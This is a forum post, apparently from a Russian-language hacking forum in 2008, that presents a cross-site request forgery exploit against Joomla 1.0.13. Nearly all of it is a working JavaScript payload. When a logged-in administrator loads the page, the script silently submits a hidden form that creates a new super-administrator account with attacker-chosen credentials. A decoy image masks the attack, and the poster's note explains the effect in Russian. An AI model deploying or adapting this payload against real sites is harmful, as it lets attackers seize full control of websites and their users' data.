13.01.2008, 21:12
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379
Репутация:
3812
|
|
Joomla 1.0.13 CSRF Vulnerability
Severity
========
Mild. It requires an administrator to be logged in and to be tricked into a specially
crafted webpage.
PHP код:
<script type="text/javascript">
window.onload = function() {
var url = "http://joomlasite.com/joomla/administrator/index2.php";
var gid = 25;
var user = 'custom_username';
var pass = 'custom_password';
var email = 'joe_cool (at) example (dot) com [email concealed]';
var param = {
name: user,
username: user,
email: email,
password: pass,
password2: pass,
gid: gid,
block: 0,
option: 'com_users',
task: 'save',
sendEmail: 1
};
var form = document.createElement('form');
form.action = url;
form.method = 'post';
form.target = 'hidden';
form.style.display = 'none';
for (var i in param) {
try {
// ie
var input = document.createElement('<input name="'+i+'">');
} catch(e) {
// other browsers
var input = document.createElement('input');
input.name = i;
}
input.setAttribute('value', param[i]);
form.appendChild(input);
}
document.body.appendChild(form);
form.submit();
}
</script>
<iframe name="hidden" style="display: none"></iframe>
<img src="http://www.more4kids.info/uploads/Image/Carebears-Cover.jpg">
PS добавляет нового админа с заданным логином, пассом и мылом, если кто не понял...
__________________
|
|
|